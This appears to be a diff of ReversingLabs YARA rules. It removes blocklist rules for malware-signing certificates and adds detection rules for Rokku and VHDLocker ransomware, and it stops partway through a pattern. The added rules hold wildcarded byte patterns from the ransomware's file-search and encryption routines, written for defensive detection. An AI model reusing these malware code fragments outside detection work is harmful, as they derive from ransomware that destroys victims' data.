-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO GARANT" and ( pe.signatures [ i ] . serial == "00:c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d" or pe.signatures [ i ] . serial == "c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d" ) and 1588679105 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_D591Da22F33C800A7024Aecff2Cd6C6D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Rokku : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Rokku ransomware."
 		author = "ReversingLabs"
-		id = "294cbf90-cd1f-5743-a51a-46e1d04ef34e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8722ed4a-b480-57ec-bba7-ce7d0f3704b9"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5540-L5558"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "30e421d5ea3c5693c5c9bd0e3dd997ceda9755d17e3fb16d2a8e6c4a327ae32f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Rokku.yara#L1-L147"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fefb342f8a9afac3b40c343b830f334225ff4198d55504846aa855acf5dfc9ba"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Rokku"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 8B E9 C7 44 24 ?? ?? ?? ?? ?? 33 DB 89 6C 24 ??
+            56 0F 57 C0 66 C7 44 24 ?? ?? ?? 57 66 0F 13 44 24 ?? B2 ?? 88 5C 24 ?? 8B CB 8A C1
+            02 C2 30 44 0C ?? 41 83 F9 ?? 73 ?? 8A 54 24 ?? EB ?? 8B CD 88 5C 24 ?? E8 ?? ?? ??
+            ?? 8D 54 24 ?? 8B C8 E8 ?? ?? ?? ?? 85 C0 75 ?? 40 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 51 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B D6 E8 ?? ?? ?? ?? 59 56 BE
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 4C 24 ?? 6A
+            ?? 8B D5 E8 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B C1 8B 94 24 ?? ?? ?? ?? 0B C2 0F 84 ??
+            ?? ?? ?? 6A ?? 5D 3B D3 77 ?? 81 F9 ?? ?? ?? ?? 76 ?? 2B CD 1B D3 52 51 55 8D 4C 24
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B C5 0F 85 ?? ?? ?? ?? 8B CD 8B C3 8A 90 ?? ?? ?? ?? 49
+            8A B0 ?? ?? ?? ?? 3A D6 75 ?? 40 85 C9 75 ?? 8B CB EB ?? 0F B6 C6 0F B6 CA 2B C8 85
+            C9 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 8B D6 50 B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 19 41 83 E8 ?? 75 ??
+            8B 6C 24 ?? 8B 7C 24 ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 2B C7 1B CD 3B EB
+        }
+		$encrypt_files_p2 = {
+            7C ?? 7F ?? 81 FF ?? ?? ?? ?? 72 ?? 8B AC 24 ?? ?? ?? ?? 0F 57 C0 8B BC 24 ?? ?? ??
+            ?? 8B 4C 24 ?? 55 57 66 0F 13 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 59 59 8B 4C 24 ??
+            3B CB 77 ?? 3B C3 77 ?? 8B F3 EB ?? 3B CB 77 ?? 72 ?? 3D ?? ?? ?? ?? 72 ?? B8 ?? ??
+            ?? ?? 55 57 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 88 ?? ?? ?? ?? 74
+            ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 56 50 8B D0 E8 ?? ?? ?? ?? 55 57 56 BA ?? ?? ?? ??
+            8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? 99 03 F8 13 EA E9 ?? ??
+            ?? ?? 6A ?? 58 89 1D ?? ?? ?? ?? 83 E8 ?? 75 ?? 8B C7 89 1D ?? ?? ?? ?? 0B C5 BE ??
+            ?? ?? ?? 74 ?? 51 8D 54 24 ?? E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 3B F1 74 ?? 56 51 BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 57 BD ?? ?? ?? ?? 8B D1 55 8D 4C 24 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? EB ?? BD ?? ?? ?? ?? 6A ?? 59 8B C1 BA ??
+            ?? ?? ?? C6 02 ?? 42 83 E8 ?? 75 ?? B8 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 6A ??
+            58 B9 ?? ?? ?? ?? C6 01 ?? 41 83 E8 ?? 75 ?? C6 06 ?? 46 83 ED ?? 75 ?? 6A ?? 8D 44
+            24 ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? B1 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? 8B C3 30 4C 04 ?? 40 83 F8 ?? 73 ?? 8A 4C 24 ?? EB ?? 8B 4C 24 ?? 8D 54 24 ??
+            88 5C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B D6 E8 ??
+            ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 33 DB 43 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B C3 EB ?? 8D 4C
+            24 ?? E8 ?? ?? ?? ?? 33 C0 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_p3 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 55 56 57 6A ?? 5E 56 BF ?? ?? ?? ?? 57 FF 15
+            ?? ?? ?? ?? 51 BB ?? ?? ?? ?? BD ?? ?? ?? ?? 8B D3 8B CD E8 ?? ?? ?? ?? 59 56 57 FF
+            15 ?? ?? ?? ?? 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6 C6 07 ?? 47
+            83 E8 ?? 75 ?? BF ?? ?? ?? ?? BA ?? ?? ?? ?? 53 8B CF E8 ?? ?? ?? ?? 59 6A ?? 58 C6
+            03 ?? 43 83 E8 ?? 75 ?? B9 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 3B E9 74 ?? 55 51 8B D6
+            E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50 51 8B D6 E8 ??
+            ?? ?? ?? 83 C4 ?? 6A ?? 5B 53 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? B9 ?? ??
+            ?? ?? 50 51 8B D3 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ??
+            51 50 6A ?? 5A 8B C8 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74
+            ?? 50 51 8B D6 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50
+            51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6A ?? 5B 3B C1 74
+            ?? 50 51 8B D3 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74 ?? 50
+            51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8B D7 50 8D 4C 24 ?? E8 ?? ?? ?? ??
+            59 BA ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 59 59 83 64 24 ?? ?? 83 EB ??
+            75 ?? 21 9C 24 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? 8B C6 C6
+            45 ?? ?? 45 83 E8 ?? 75 ?? C6 07 ?? 47 83 EE ?? 75 ?? 33 C0 5F 40 5E 5D 5B 8B E5 5D
+            C3
+        }
+		$find_files_p1 = {
+            55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 8B F0 66 C7 45 ?? ?? ?? 33 DB 89 35
+            ?? ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ??
+            ?? 66 C7 45 ?? ?? ?? 02 C8 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? 88
+            5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D ??
+            32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ??
+            8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1
+            C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44
+            05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59
+            6A ?? 33 C9 C7 45 ?? ?? ?? ?? ?? 5B B0 ?? 88 5D ?? 32 C3 88 4D ?? 88 45 ?? 8B C1 C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 88 4D ?? 80 44 05 ?? ?? 40 83 F8 ?? 72 ?? 8B
+            0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 6A ?? 88 5D ?? B2 ?? 66 C7 45
+            ?? ?? ?? 33 C9 66 C7 45 ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 5B 8D
+            04 0A 30 44 0D ?? 41 3B CB 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 33 C9 C6 45 ?? ?? 58 34 ?? 88 4D ?? 88 45
+        }
+		$find_files_p2 = {
+            B2 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D 04 0A 30 44 0D
+            ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? C6 45 ??
+            ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 80 F3 ?? C6 45 ?? ?? 88 5D ?? 8D 55 ??
+            33 DB C6 45 ?? ?? 50 88 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 59 59 6A ?? 58 34 ?? C6 45 ?? ?? 88 45 ?? B2 ?? 88 5D ?? 8B CB C7 45 ?? ?? ?? ??
+            ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ??
+            8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ??
+            8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44 05 ?? ??
+            40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? B0 ?? C6 45
+            ?? ?? 34 ?? 88 5D ?? 59 88 45 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A
+            4D ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 0F 28 05
+            ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? 8A
+            45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ??
+            E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
+        }
+		$find_folders = {
+            55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 DB 8B F0 66
+            C7 45 ?? ?? ?? 89 35 ?? ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8D 45 ??
+            88 5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D
+            ?? 32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 66 C7 45 ?? ?? ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45
+            ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45
+            ?? ?? ?? ?? ?? 88 45 ?? B2 ?? C7 45 ?? ?? ?? ?? ?? 8B CB 66 C7 45 ?? ?? ?? 88 5D ??
+            8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50
+            8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45 ?? ??
+            ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 80 44 05 ??
+            ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 66 C7
+            45 ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 80 44
+            05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59
+            66 C7 45 ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 66 C7 45 ?? ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8B 0D ?? ??
+            ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? B2 ?? C7 45
+            ?? ?? ?? ?? ?? 8B CB C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D
+            04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D
+            55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO T2 Soft" and ( pe.signatures [ i ] . serial == "00:d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d" or pe.signatures [ i ] . serial == "d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d" ) and 1588679107 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_folders and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B36E0F2053Caee9C3B966F7Be0B40Fc3 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Vhdlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects VHDLocker ransomware."
 		author = "ReversingLabs"
-		id = "8ed732ae-1c25-59fc-8ebe-50a1eb81e4a9"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "696f8145-342b-5da5-b9ec-6f0d16afc465"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5560-L5578"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2444c78aefdb9e8c8004598a318db016d7e781ede6da2ba3ee85316456c3e77b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.VHDLocker.yara#L1-L152"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "39d1fbfc79d5ea866498bb1e40d2290469df774ce65b1da04a85c0e4e5b4493c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "VHDLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PARTS-JEST d.o.o." and ( pe.signatures [ i ] . serial == "00:b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3" or pe.signatures [ i ] . serial == "b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3" ) and 1600172855 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_5B320A2F46C99C1Ba1357Bee : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "3912fdfc-7a84-51ce-abd2-977ad183af26"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5580-L5596"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "12797f80bce9d64c6c07e185aa309a0c4f910835745a7f2cc1874fb1211624d8"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 50 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            33 DB 8D 95 ?? ?? ?? ?? 53 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ??
+            ?? ?? 89 9D ?? ?? ?? ?? 33 F6 8B FF 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ?? 46 83 FE ??
+            7C ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D
+            B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 8D
+        }
+		$encrypt_files_p2 = {
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 57 FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
+            ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 35 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50 57 FF 15 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? 52 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D 95 ?? ?? ??
+            ?? 52 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 81 BD ??
+            ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ??
+            ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 11 9D ?? ?? ?? ??
+            83 FA ?? 0F 84 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9
+        }
+		$encrypt_files_p3 = {
+            75 ?? 2B C2 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51 8D 14 00 A1 ?? ?? ?? ?? 52 53 50 FF D6
+            8B 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 52 FF D6 8B 15 ??
+            ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? 51 52 FF D6 8B 0D ?? ?? ?? ?? 6A
+            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 51 FF D6 8B 0D ?? ?? ?? ?? 6A ?? 8D 95
+            ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 51 FF D6 EB ?? 8B 9D ?? ?? ?? ?? 6A ?? 33
+            C9 51 51 B8 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 DB EB ?? 83 85 ?? ??
+            ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55
+            ?? 8B B5 ?? ?? ?? ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 8D 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 52 FF 15 ?? ?? ?? ?? 33 C9
+            51 51 33 C0 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 FF 15 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64
+            89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 68 ?? ?? ?? ?? 33 F6
+            8D 8D ?? ?? ?? ?? 33 C0 56 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8D 95
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ??
+            52 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B
+            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 57 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ??
